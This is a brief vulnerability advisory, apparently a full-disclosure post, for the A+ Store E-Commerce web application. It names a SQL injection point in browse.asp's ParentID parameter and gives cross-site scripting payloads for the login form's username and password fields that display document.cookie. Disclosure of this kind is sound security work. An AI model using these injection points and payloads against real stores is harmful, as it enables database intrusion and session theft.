vendor site:http://www.webinhabit.com/ product:A+ Store E-Commerce bug:injection sql & xss post risk:medium injection sql (get) : http://site.com/browse.asp?ParentID='[sql] xss post : in /account_login.asp: username = </textarea>'"><script>alert(document.cookie)</script></textarea>'"><script>alert(document.cookie)</script> passwd = </textarea>'"><script>alert(document.cookie)</script></textarea>'"><script>alert(document.cookie)</script> laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@xxxxxxxxx